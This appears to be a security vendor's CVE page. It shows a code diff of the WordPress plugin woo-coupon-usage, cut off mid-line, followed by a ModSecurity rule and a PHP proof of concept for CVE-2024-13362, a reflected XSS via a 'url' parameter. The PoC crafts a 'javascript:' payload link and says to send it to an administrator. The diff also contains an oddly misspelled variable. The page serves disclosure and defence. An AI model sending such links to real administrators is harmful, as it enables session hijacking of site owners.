+ <?php echo wcusage_setting_toggle('.wcusage_field_commission_disable_non_affiliate', '.wcu-field-section-non-affiliate'); // Show or Hide ?>
+ <span class="wcu-field-section-non-affiliate">
+ <?php if( wcu_fs()->can_use_premium_code() ) { ?>
+ <br/><br/>
+
+ <?php echo wcusage_setting_toggle_option('wcusage_field_commission_disable_non_affiliate_unpaid', 1, esc_html__( 'Stop "unpaid commission" from being earned for non-affiliate coupons.', 'woo-coupon-usage' ), '40px'); ?>
+ <i style="margin-left: 40px;"><?php echo esc_html__( 'When enabled, the unpaid commission will also not be added to non-affiliate coupons.', 'woo-coupon-usage' ); ?></i>
+ <?php } ?>
+ </span>
+
</span>
</div>
@@ -222,14 +230,14 @@
<?php $textaffiliatecommission = esc_html__( 'Affiliate commission', 'woo-coupon-usage' ) . ": "; ?>
<!-- Percentage Amount Of Total Order -->
- <?php echo wcusage_setting_number_option('wcusage_field_affiliate', '0', esc_html__('Percentage Commission (% Of Total Order)', 'woo-coupon-usage'), '0px'); ?>
+ <?php echo wcusage_setting_number_option('wcusage_field_affiliate', '0', esc_html__('Percentage Commission (% Of Total Order)', 'woo-coupon-usage'), '0px', '0.01'); ?>
<br/>
<!-- Fixed Amount Per Order -->
<?php
$fixed_order_label = sprintf(esc_html_x('Fixed Commission (%s - Amount Per Order)', 'woo-coupon-usage'), wcusage_get_currency_symbol());
- echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_order', '0', $fixed_order_label, '0px');
+ echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_order', '0', $fixed_order_label, '0px', '0.01');
?>
<br/>
@@ -237,7 +245,7 @@
<!-- Fixed Amount Per Product -->
<?php
$fixed_product_label = sprintf(esc_html_x('Fixed Commission (%s - Amount Per Product)', 'woo-coupon-usage'), wcusage_get_currency_symbol());
- echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_product', '0', $fixed_product_label, '0px');
+ echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_product', '0', $fixed_product_label, '0px', '0.01');
?>
<?php
--- a/woo-coupon-usage/inc/admin/settings/options-general.php
+++ b/woo-coupon-usage/inc/admin/settings/options-general.php
@@ -389,7 +389,12 @@
<br/>
<!-- Show shipping costs. -->
- <?php echo wcusage_setting_toggle_option('wcusage_field_show_shipping', 0, esc_html__( 'Show shipping costs.', 'woo-coupon-usage' ), '0px'); ?>
+ <?php echo wcusage_setting_toggle_option('wcusage_field_show_shipping', 0, esc_html__( 'Show "shipping" costs column.', 'woo-coupon-usage' ), '0px'); ?>
+
+ <br/>
+
+ <!-- Show tax costs. -->
+ <?php echo wcusage_setting_toggle_option('wcusage_field_show_order_tax', 0, esc_html__( 'Show order "tax" column.', 'woo-coupon-usage' ), '0px'); ?>
<br/>
@@ -564,6 +569,15 @@
<br/>
<p>
+ <?php echo wcusage_setting_toggle_option('wcusage_field_rates_show_all_variations', 0, esc_html__( 'Show All Product Variations', 'woo-coupon-usage' ), '40px'); ?>
+ <i style="margin-left: 40px;"><?php echo esc_html__( 'If enabled, all variations of a product will be shown in the table as seperate rows.', 'woo-coupon-usage' ); ?></i>
+ <br/>
+ <i style="margin-left: 40px;"><?php echo esc_html__( 'If disabled, only the parent product will be shown - and variations that have per-variation commission rates set different to the parent.', 'woo-coupon-usage' ); ?></i>
+ </p>
+
+ <br/>
+
+ <p>
<?php echo wcusage_setting_toggle_option('wcusage_field_rates_show_search', 1, esc_html__( 'Show Search Field', 'woo-coupon-usage' ), '40px'); ?>
</p>
@@ -910,7 +924,7 @@
} else {
$name = 'wcusage_field_order_type_custom['.$key.']';
}
- echo '<span style="margin-right: 20px;'.esc_attr($extrastyles).'" id="'.esc_attr($thisid).'">
+ echo '<span style="display: inline-block; margin: 10px 20px 10px 0;'.esc_attr($extrastyles).'" id="'.esc_attr($thisid).'">
<input type="checkbox"
style="'.esc_attr($extrastyles).'" checktype="multi"
class="order-status-checkbox-'.esc_attr($key).'"
@@ -932,19 +946,21 @@
<div class="setup-hide">
- <br/>
+ <?php $wcusage_field_order_sort = wcusage_get_setting_value('wcusage_field_order_sort', 'paiddate'); ?>
+ <?php if( $wcusage_field_order_sort != "completeddate" ) { ?>
+ <br/>
<p><strong><?php echo esc_html__( 'Advanced Orders Settings', 'woo-coupon-usage' ); ?>:</strong>
<button type="button" class="wcu-showhide-button" id="wcu_show_orders_advanced">Show <span class="fa-solid fa-arrow-down"></span></button></p>
<?php echo wcu_admin_settings_showhide_toggle("wcu_show_orders_advanced", "wcu_orders_advanced", "Show", "Hide"); ?>
<div id="wcu_orders_advanced" style="display: none;">
+ <?php } ?>
<br/>
<!-- How to sort orders -->
<p>
- <?php $wcusage_field_order_sort = wcusage_get_setting_value('wcusage_field_order_sort', 'paiddate'); ?>
<input type="hidden" value="0" id="wcusage_field_order_sort" data-custom="custom" name="wcusage_options[wcusage_field_order_sort]" >
<style>
@@ -972,7 +988,7 @@
</script>
<strong><label for="scales"><?php echo esc_html__( 'By which date should orders be sorted on the affiliate dashboard?', 'woo-coupon-usage' ); ?></label></strong><br/>
<select name="wcusage_options[wcusage_field_order_sort]" id="wcusage_field_order_sort" onchange="check_order_sort_dropdown()">
- <option class="wcusage_field_order_sort_option" value="paiddate" <?php if($wcusage_field_order_sort == "paiddate") { ?>selected<?php } ?>><?php echo esc_html__( 'Created Date', 'woo-coupon-usage' ); ?></option>
+ <option class="wcusage_field_order_sort_option" value="paiddate" <?php if($wcusage_field_order_sort == "paiddate") { ?>selected<?php } ?>><?php echo esc_html__( 'Created Date (Recommended)', 'woo-coupon-usage' ); ?></option>
<option class="wcusage_field_order_sort_option" value="completeddate" <?php if($wcusage_field_order_sort == "completeddate") { ?>selected<?php } ?>><?php echo esc_html__( 'Completed Date', 'woo-coupon-usage' ); ?></option>
</select>
<br/><i><?php echo esc_html__( 'This will determine how the orders are sorted on the affiliate dashboard, either by the day they were paid for, or the day it was set to completed.', 'woo-coupon-usage' ); ?></i>
@@ -982,10 +998,13 @@
<?php echo esc_html__( 'NOTE: If set to "Completed Date", only orders that have been marked as "completed" (at-least once) can be displayed on the dashboard.', 'woo-coupon-usage' ); ?>
<br/>
<?php echo esc_html__( 'This may therefore disregard some of the order statuses that are checked above.', 'woo-coupon-usage' ); ?>
+ <?php echo esc_html__( 'Ideally you should only enable "completed" order statuses above if you have "Completed Date" selected.', 'woo-coupon-usage' ); ?>
</i>
</span>
+ <?php if( $wcusage_field_order_sort != "completeddate" ) { ?>
</div>
+ <?php } ?>
</div>
--- a/woo-coupon-usage/inc/admin/settings/options-notifications.php
+++ b/woo-coupon-usage/inc/admin/settings/options-notifications.php
@@ -524,7 +524,10 @@
<?php echo wcusage_setting_text_option('wcusage_field_registration_admin_email', get_bloginfo( 'admin_email' ), esc_html__( 'Email address for recieving admin notifications:', 'woo-coupon-usage' ), '0px'); ?>
<i><?php echo esc_html__( 'This is the email address that will recieve admin notifications such as new affiliate registrations, and payout notifications.', 'woo-coupon-usage' ); ?></i>
- <br/>
+ <br/><br/>
+
+ <!-- Enable New Order Info -->
+ <?php echo wcusage_setting_toggle_option('wcusage_field_new_order_info', 1, esc_html__( 'Enable "Affiliate Information" section in the admin "New Order" email.', 'woo-coupon-usage' ), '0px'); ?>
<br/>
<hr style="margin-bottom: 35px;"/>
--- a/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-coupons.php
+++ b/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-coupons.php
@@ -74,8 +74,8 @@
<?php echo do_action('wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap wcusage-bulk-edit-coupons wcusage-tools">
- <h2><?php echo esc_html__('Bulk Edit: Coupon Settings', 'your-text-domain'); ?></h2>
- <p><?php echo esc_html__('Use this tool to bulk edit your coupon settings.', 'your-text-domain'); ?></p>
+ <h2><?php echo esc_html__('Bulk Edit: Coupon Settings', 'woo-coupon-usage'); ?></h2>
+ <p><?php echo esc_html__('Use this tool to bulk edit your coupon settings.', 'woo-coupon-usage'); ?></p>
<br/>
<button id="import-csv" class="button">Import CSV</button>
<button id="export-csv" class="button">Export CSV</button>
@@ -86,15 +86,15 @@
<div class="wcu-scrollable-table">
<table id="wcusage-tools-rows">
<tr>
- <th><?php echo esc_html__('Coupon ID', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Coupon Name', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Discount Type', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Discount Amount', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Affiliate Username', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Coupon ID', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Coupon Name', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Discount Type', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Discount Amount', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Affiliate Username', 'woo-coupon-usage'); ?></th>
<?php if (wcu_fs()->can_use_premium_code()) { ?>
- <th><?php echo esc_html__('Commission Percent', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission £ - Order', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission £ - Product', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Commission Percent', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission £ - Order', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission £ - Product', 'woo-coupon-usage'); ?></th>
<?php } ?>
</tr>
<?php wcusage_bulk_coupon_fields(); ?>
--- a/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-products.php
+++ b/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-products.php
@@ -49,9 +49,9 @@
<?php echo do_action('wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap wcusage-bulk-edit-products wcusage-tools">
- <h2><?php echo esc_html__('Bulk Edit: Product Settings', 'your-text-domain'); ?></h2>
- <p><?php echo esc_html__('Use this tool to bulk edit your per-product commission settings. The username must exist or it will not be updated.', 'your-text-domain'); ?></p>
- <p><?php echo esc_html__('Currently "Per-Affiliate Product Commission Rates" can only be edited by viewing/editing the individual product.', 'your-text-domain'); ?></p>
+ <h2><?php echo esc_html__('Bulk Edit: Product Settings', 'woo-coupon-usage'); ?></h2>
+ <p><?php echo esc_html__('Use this tool to bulk edit your per-product commission settings. The username must exist or it will not be updated.', 'woo-coupon-usage'); ?></p>
+ <p><?php echo esc_html__('Currently "Per-Affiliate Product Commission Rates" can only be edited by viewing/editing the individual product.', 'woo-coupon-usage'); ?></p>
<br/>
<button id="import-csv" class="button">Import CSV</button>
<button id="export-csv" class="button">Export CSV</button>
@@ -62,10 +62,10 @@
<div class="wcu-scrollable-table">
<table id="wcusage-tools-rows">
<tr>
- <th><?php echo esc_html__('Product ID', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Product Name', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission Percent', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission Fixed', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Product ID', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Product Name', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission Percent', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission Fixed', 'woo-coupon-usage'); ?></th>
</tr>
<?php wcusage_bulk_product_fields(); ?>
</table>
--- a/woo-coupon-usage/inc/admin/tools/admin-bulk-product-rates.php
+++ b/woo-coupon-usage/inc/admin/tools/admin-bulk-product-rates.php
@@ -43,9 +43,9 @@
?>
<?php echo do_action('wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap wcusage-tools">
- <h2><?php echo esc_html__('Bulk Assign: Per-Affiliate Product Rates', 'your-text-domain'); ?></h2>
+ <h2><?php echo esc_html__('Bulk Assign: Per-Affiliate Product Rates', 'woo-coupon-usage'); ?></h2>
<p></p>
- <p><?php echo esc_html__('Bulk assign per-product commission rates, on a per-affiliate basis. Any existing rates will also be updated.', 'your-text-domain'); ?></p>
+ <p><?php echo esc_html__('Bulk assign per-product commission rates, on a per-affiliate basis. Any existing rates will also be updated.', 'woo-coupon-usage'); ?></p>
<form id="bulk-assign-coupon-form" method="POST">
<input type="hidden" name="action" value="assign_rates">
<input type="hidden" name="_wpnonce" value="<?php echo esc_html($nonce); ?>">
@@ -53,11 +53,11 @@
<div class="wcu-scrollable-table">
<table id="wcusage-tools-rows" style="margin: 0;">
<tr style="text-align: left;">
- <th><?php echo esc_html__('Product ID', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Type', 'your-text-domain'); ?></th>
- <th class='the-type'><?php echo esc_html__('Affiliate', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Percent', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Fixed', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Product ID', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Type', 'woo-coupon-usage'); ?></th>
+ <th class='the-type'><?php echo esc_html__('Affiliate', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Percent', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Fixed', 'woo-coupon-usage'); ?></th>
</tr>
<?php wcusage_bulk_assign_rates_fields(); ?>
</table>
--- a/woo-coupon-usage/inc/dashboard/tab-latest-orders.php
+++ b/woo-coupon-usage/inc/dashboard/tab-latest-orders.php
@@ -65,6 +65,7 @@
$option_show_amount = wcusage_get_setting_value( 'wcusage_field_amount', '1' );
$option_show_amount_saved = wcusage_get_setting_value( 'wcusage_field_amount_saved', '1' );
$option_show_shipping = wcusage_get_setting_value( 'wcusage_field_show_shipping', '0' );
+ $option_show_tax = wcusage_get_setting_value( 'wcusage_field_show_order_tax', '0' );
$option_show_list_products = wcusage_get_setting_value( 'wcusage_field_list_products', '1' );
$wcusage_show_commission = wcusage_get_setting_value( 'wcusage_field_show_commission', '1' );
$isordersstartset = false;
@@ -72,7 +73,7 @@
global $woocommerce;
$c = new WC_Coupon($coupon_code);
$the_coupon_usage = $c->get_usage_count();
- $wcusage_page_load = wcusage_get_setting_value( 'wcusage_field_page_load', '' );
+ $wcusaFge_page_load = wcusage_get_setting_value( 'wcusage_field_page_load', '' );
//if($the_coupon_usage > 5000) { $wcusage_page_load = 1; }
/**/
$wcusage_field_load_ajax = wcusage_get_setting_value( 'wcusage_field_load_ajax', '1' );
@@ -178,6 +179,7 @@
$option_show_amount = wcusage_get_setting_value( 'wcusage_field_amount', '1' );
$option_show_amount_saved = wcusage_get_setting_value( 'wcusage_field_amount_saved', '1' );
$option_show_shipping = wcusage_get_setting_value( 'wcusage_field_show_shipping', '0' );
+ $option_show_tax = wcusage_get_setting_value( 'wcusage_field_show_order_tax', '0' );
$option_show_list_products = wcusage_get_setting_value( 'wcusage_field_list_products', '1' );
$wcusage_show_commission = wcusage_get_setting_value( 'wcusage_field_show_commission', '1' );
// Check if disable non affiliate commission
@@ -360,6 +362,19 @@
?>
<?php
+ if ( $option_show_tax ) {
+ ?>
+ .wcu-table-recent-orders td:nth-of-type(<?php
+ echo esc_html( $wcusage_ro_label_count );
+ ?>):before { content: "Tax"; }
+ <?php
+ $wcusage_ro_label_count++;
+ ?>
+ <?php
+ }
+ ?>
+
+ <?php
if ( $option_show_ordercountry ) {
?>
.wcu-table-recent-orders td:nth-of-type(<?php
@@ -507,6 +522,16 @@
?>
<?php
+ if ( $option_show_tax ) {
+ ?>
+ <th class='wcuTableHead'><?php
+ echo esc_html__( 'Tax', 'woo-coupon-usage' );
+ ?></th>
+ <?php
+ }
+ ?>
+
+ <?php
if ( $orders['total_commission'] > 0 && $wcusage_show_commission ) {
?>
<th class='wcuTableHead'>
@@ -676,9 +701,10 @@
if ( $wcusage_field_order_sort != "completeddate" ) {
$showdate = $order_date;
$showtime = get_the_time( 'U', $orderid );
+ $showtime = date_i18n( "g:i a", $showtime );
} else {
$showdate = $completed_date;
- $showtime = strtotime( $completed_date );
+ $showtime = strtotime( $orderinfo->get_date_completed() );
$showtime = date_i18n( "g:i a", $showtime );
}
$wcusage_show_tax = wcusage_get_setting_value( 'wcusage_field_show_tax', '0' );
@@ -802,7 +828,7 @@
// Time
if ( $option_show_time ) {
echo "<td class='wcuTableCell'>";
- echo "<span>" . esc_html( date_i18n( 'g:i a', $showtime ) ) . "</span>";
+ echo "<span>" . esc_html( $showtime ) . "</span>";
echo "</td>";
}
// Status
@@ -840,6 +866,12 @@
''
) ) . "</td>";
}
+ // Tax
+ if ( $option_show_tax != "0" ) {
+ echo "<td class='wcuTableCell'> " . wcusage_format_price( $orderinfo->get_total_tax() ) . "</td>";
+ $col7 = true;
+ }
+ // Commission
if ( $orders['total_commission'] > 0 && $wcusage_show_commission ) {
echo "<td class='wcuTableCell'> ";
if ( $type == "mla" ) {
@@ -905,7 +937,7 @@
}
/* Show the "MORE" products list column / toggle on table */
if ( $option_show_list_products == "1" ) {
- if ( $orderinfo->get_items() ) {
+ if ( $orderinfo->get_items() && $orderinfo->get_status() != "refunded" ) {
echo "<td class='wcuTableCell excludeThisClass orderproductstd orderproductstd" . esc_attr( $random ) . "-" . esc_html( $orderid ) . "' style='min-width: 100px; font-size: 16px;'>";
echo "<a class='listproductsbutton' href='javascript:void(0);' id='listproductsbutton-" . esc_attr( $random ) . "-" . esc_html( $orderid ) . "'>" . esc_html__( "MORE", "woo-coupon-usage" ) . " <i class='fas fa-chevron-down'></i> <i class='fas fa-chevron-up' style='display: none;'></i></i></i></a>";
} else {
--- a/woo-coupon-usage/inc/dashboard/tab-statistics.php
+++ b/woo-coupon-usage/inc/dashboard/tab-statistics.php
@@ -147,9 +147,11 @@
$wcusage_monthly_summary_data_orders = array();
}
// Delete old months that are not needed
- foreach ( $wcusage_monthly_summary_data_orders as $key => $value ) {
- if ( $key != strtotime( $date1month ) && $key != strtotime( $date2month ) && $key != strtotime( $date3month ) ) {
- $wcusage_monthly_summary_data_orders[strtotime( $key )] = "";
+ if ( is_array( $wcusage_monthly_summary_data_orders ) && count( $wcusage_monthly_summary_data_orders ) > 12 ) {
+ foreach ( $wcusage_monthly_summary_data_orders as $key => $value ) {
+ if ( $key != strtotime( $date1month ) && $key != strtotime( $date2month ) && $key != strtotime( $date3month ) ) {
+ $wcusage_monthly_summary_data_orders[strtotime( $key )] = "";
+ }
}
}
// This Month
--- a/woo-coupon-usage/inc/emails/new-order-email.php
+++ b/woo-coupon-usage/inc/emails/new-order-email.php
@@ -85,35 +85,83 @@
/**
* Include affiliate details in admin order email
*/
-if( !function_exists( 'wcusage_admin_order_email' ) ) {
- function wcusage_admin_order_email( $order, $sent_to_admin, $plain_text, $email ) {
+if ( ! function_exists( 'wcusage_admin_order_email' ) ) {
+ function wcusage_admin_order_email( $order, $sent_to_admin, $plain_text, $email ) {
- if ( $email->id === 'new_order' && $sent_to_admin ) {
-
- $order_id = $order->get_id();
-
- $affiliate = wcusage_order_meta($order_id,'wcusage_affiliate_user');
- $commission = wcusage_order_meta($order_id,'wcusage_total_commission');
-
- if($affiliate) {
-
- $user_info = get_userdata($affiliate);
+ $wcusage_field_new_order_info = wcusage_get_setting_value('wcusage_field_new_order_info', '1');
+ if(!$wcusage_field_new_order_info) {
+ return;
+ }
- $user_login = $user_info->user_login;
- $user_email = $user_info->user_email;
+ if ( $email->id === 'new_order' && $sent_to_admin ) {
- $affiliate_info = "<h2>Affiliate Information</h2>";
- $affiliate_info .= "<p><strong>Affiliate:</strong> " . $user_login . "</p>";
- $affiliate_info .= "<p><strong>Email:</strong> " . $user_email . "</p>";
- $affiliate_info .= "<p><strong>Commission:</strong> " . wcusage_format_price($commission) . "</p><br/><br/>";
-
- echo $affiliate_info;
+ $order_id = $order->get_id();
- }
+ $affiliate = wcusage_order_meta( $order_id, 'wcusage_affiliate_user' );
+ $commission = wcusage_order_meta( $order_id, 'wcusage_total_commission' );
- }
+ if ( $affiliate ) {
- }
+ $user_info = get_userdata( $affiliate );
+ $user_login = $user_info->user_login;
+ $user_email = $user_info->user_email;
+
+ // Affiliate Information Table
+ echo '<h2>' . esc_html__( 'Affiliate Information', 'woo-coupon-usage' ) . '</h2>';
+ echo '<table style="width: 100%; border-collapse: collapse; border: 1px solid #e5e5e5;" cellspacing="0" cellpadding="6" border="1">';
+ echo '<tbody>';
+ echo '<tr>';
+ echo '<th style="text-align: left; padding: 12px; background-color: #f7f7f7;">' . esc_html__( 'Affiliate', 'woo-coupon-usage' ) . '</th>';
+ echo '<td style="padding: 12px;">' . esc_html( $user_login ) . '</td>';
+ echo '</tr>';
+
+ // If coupons exist, display Coupon Information Table
+ if ( version_compare( WC_VERSION, 3.7, ">=" ) ) {
+ $coupons = $order->get_coupon_codes();
+ } else {
+ $coupons = $order->get_used_coupons();
+ }
+ if ( $coupons ) {
+
+ foreach ( $coupons as $coupon_code ) {
+
+ echo '<tr>';
+
+ $coupon = new WC_Coupon( $coupon_code );
+ $couponid = $coupon->get_id();
+ $coupon_name = $coupon->get_code();
+ $coupon_amount = $coupon->get_amount();
+ $coupon_type = $coupon->get_discount_type();
+ $coupon_description = $coupon->get_description();
+
+ $coupon_info = wcusage_get_coupon_infModSecurity Protection Against This CVE
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13362
# Block reflected XSS via url parameter in Freemius trial promotion notices
# Targets admin.php pages with wcusage_tools and an unsanitized url parameter
SecRule REQUEST_URI "@rx /wp-admin/admin.php"
"id:20241994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius reflected XSS via url param',severity:'CRITICAL',tag:'CVE-2024-13362'"
SecRule ARGS_GET:page "@rx ^wcusage_tools$" "chain"
SecRule ARGS_GET:url "@rx (javascript|data|vbscript):" "t:none"
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter
// Configuration
$target_url = 'https://example.com/wp-admin/admin.php?page=wcusage_tools&url=';
$payload = 'javascript:alert("XSS by Atomic Edge")';
$malicious_url = $target_url . urlencode($payload);
echo "[+] Atomic Edge PoC for CVE-2024-13362n";
echo "[+] Target URL: " . $target_url . "n";
echo "[+] Payload: " . $payload . "n";
echo "[+] Crafted malicious URL: " . $malicious_url . "nn";
echo "[+] To exploit, send this link to an authenticated administrator:n";
echo $malicious_url . "nn";
// Simulate the vulnerable code path
function simulate_vulnerable_sdk($trial_url) {
// This mimics the vulnerable sprintf call from the diff
$button = sprintf(
'<a style="margin-left:10px; vertical-align:super;" href="%s"><button class="button button-primary">start free trial ➜</button></a>',
$trial_url
);
return $button;
}
echo "[+] Simulating vulnerable SDK output:n";
echo simulate_vulnerable_sdk($malicious_url) . "n";
echo "[+] Exploit URL:n";
echo $malicious_url . "n";
?>Frequently Asked Questions
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
